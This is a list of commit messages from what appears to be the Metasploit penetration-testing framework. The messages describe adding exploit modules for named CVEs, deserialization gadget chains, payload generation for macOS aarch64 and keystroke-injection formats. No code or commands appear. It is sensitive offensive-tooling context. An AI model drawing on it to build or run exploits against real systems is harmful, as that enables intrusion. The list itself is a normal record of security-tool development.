1140efc8b4
Support adding encrypted files to archives & jars
2023-10-13 14:42:10 +01:00
05dd2e1473
Land #18351 , Apache Superset RCE (CVE-2023-37941)
2023-10-12 17:10:10 -04:00
59da2865d9
Use an exec-in-place gadget for Python
...
This adds a Python deserialization gadget that will exec arbitrary
Python code in place. It is only compatible with Python 3.x due to
differences in Python's exec function and statement between 2 and 3.
2023-10-10 14:01:24 -04:00
d64ed33cdf
code spell for a bunch of modules
2023-09-24 17:42:00 -04:00
9a40e2612b
Land #17129 , Add OSX Aarch64 Payload support
2023-08-02 18:37:56 +01:00
8e0a909b18
Fixes incorrect usage of pack/unpack directives
2023-07-19 11:39:00 +01:00
085943bd78
Add Ruby 3.3.0-preview1 to test suite
2023-06-29 22:53:17 +01:00
e70bdb028a
Basic MachO Signing
...
This commit adds the sign method to Payload::MachO which performs a
basic SHA256 signature update on the provided macho to enable it to run
under osx aarch64 systems.
2023-06-19 10:57:37 +02:00
658c87996d
Hotwire MachO Signing
...
This commit hotwires in executable signing to some of the aarch64 osx
payloads in order to ensure that they are fully functional.
2023-06-19 10:57:37 +02:00
8a5442f7f0
Fix AARCH64 MachO Generation
...
This updates the exe util to properly generate stageless aarch64 macho
payloads. I've also added comments on how to assemble the aarch64
stages.
2023-06-19 10:57:37 +02:00
5f8767f4cf
M1ssion Dyld Mettle: Aarch64 Payloads
...
This builds on Back from the dyld by adding the required aarch64
assembly code to enable the OSX loader to run on the m1. This enables
the use of native payloads on M1 or M2 devices that do not have Rosetta
installed.
2023-06-19 10:57:37 +02:00
c41483250f
Fix an edge case in .to_win32pe
...
When the entry point is after the payload, there woud occassionally be
cases where `poff` and `eidx` to be invalid, causing `entry` to be
truncated. `poff` should never be negative and `eidx` should reserve the
256 bytes that `entry` may occupy.
2023-06-13 13:41:47 -04:00
f9c6caa804
Land #17785 , add SolarWinds (SWIS) deser RCE
2023-03-27 15:25:17 -05:00
bfac7e6e0b
Add a formatter_compatible_gadget_chains function
2023-03-23 17:28:58 -04:00
ff3b68a352
Add the ObjectDataProvider+JsonNetFormatter
2023-03-23 17:28:58 -04:00
236de61130
Land #17583 , Enhances info -d with references to AttackerKB
2023-03-21 12:38:36 +00:00
9dcaf93b29
Replace deprecated File.exists? with File.exist?
2023-03-05 14:30:47 +11:00
e7da4c4612
Land #17594 , Add larger DLL templates
2023-02-15 19:35:37 -06:00
301d25ddfa
Raise more explicit errors for invalid arguments
2023-02-15 09:07:01 -05:00
5725dd2ded
Fix an off by one size error
2023-02-14 18:01:14 -05:00
ac9d60ce9e
Land #17281 , Added module for CVE-2022-2992
...
Added module for CVE-2022-2992 - Gitlab Remote Command Execution via Github import
2023-02-14 16:57:29 -05:00
fd6cd82f30
Upgrade DLL template size automatically
2023-02-09 15:09:50 -05:00
b789e00ea7
Enhances info -d with references to AttackerKB
2023-02-03 10:15:55 +00:00
6043d0ffba
Update all links from Wiki site to new docs site.
2023-01-27 09:58:53 -06:00
2783e92203
Update windows_secrets_dump and Keytab module to export kerberos keys
2022-12-14 13:40:39 +00:00
cf6d5d3a14
It made the gadgets being used more readable
2022-12-06 17:47:49 +01:00
704cee436b
Apply suggestions from code review
2022-11-29 15:25:14 +01:00
c1236500f1
Apply suggestions from code review
...
Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com >
2022-11-29 14:12:39 +01:00
637ad5f809
make ducky more psh friendly
2022-11-21 17:55:48 -05:00
34d191b06c
Added Ruby serialized payload generator
2022-11-19 15:20:49 +01:00
29b7fa5336
ducky_script format for msfvenom
2022-11-18 17:02:52 -05:00
0d9cca79b4
Fix crash when generating payload sizes
2022-11-04 02:10:58 +00:00
97bce45e69
Land #16915 , Add exploit for CVE-2022-23277 (Exchange RCE)
2022-08-19 11:11:46 -05:00
7c1dd17c86
Add a missing verison, fix typos
2022-08-17 17:36:31 -04:00
5faee26f10
Add the DataSetTypeSpoof .NET deserialization chain
2022-08-08 17:52:51 -04:00
852fac48b1
Add the DataSet .NET deserialization chain
2022-08-08 17:51:37 -04:00
310cfde62b
Fix a bug with empty length-prefixed strings
2022-08-08 15:14:17 -04:00
a415a86c11
Fix a bug caused by ClassTypeInfo additional info
...
The ClassTypeInfo does not have a #value method that returns a scalar,
switch to using snapshot instead.
2022-08-03 16:38:43 -04:00
56d1225900
Add the ArraySinglePrimitive data type
2022-08-03 16:38:29 -04:00
f65119b353
Support OpenSSL3 and run Ubuntu 22.04 in test matrix
2022-08-03 15:49:53 +01:00
9f6950c6c8
Ensure HTML is escaped in markdown codeblocks
2022-04-27 19:51:05 +01:00
bbf9e3163a
Fix file reads on Windows for binary files
2022-03-21 12:47:39 +00:00
a6a63d0895
Rename scope to zone_id
2022-03-15 11:14:41 -04:00
71cacc4cc2
Catch SocketError when normalizing the hostname
2022-03-14 17:09:37 -04:00
6be3443680
Land #16103 , LPE in polkit's pkexec (CVE-2021-4034)
2022-03-03 09:24:11 -05:00
c9408c7b1b
Remove pointless format string
2022-03-03 06:40:26 -06:00
5246e9cb7e
Add rescue for failed authentication on info -d
2022-03-02 16:41:19 -06:00
06e897436c
Add Fedora results to docs and some minor final cleanup
2022-03-02 09:12:01 -06:00
9635fde12d
Add support and templates for aarch64 targets
2022-02-10 10:49:02 -06:00
e6c1d20c5d
Add the ClaimsPrincipal .NET gadget chain
2022-02-09 14:38:51 -05:00
sjanusz-r7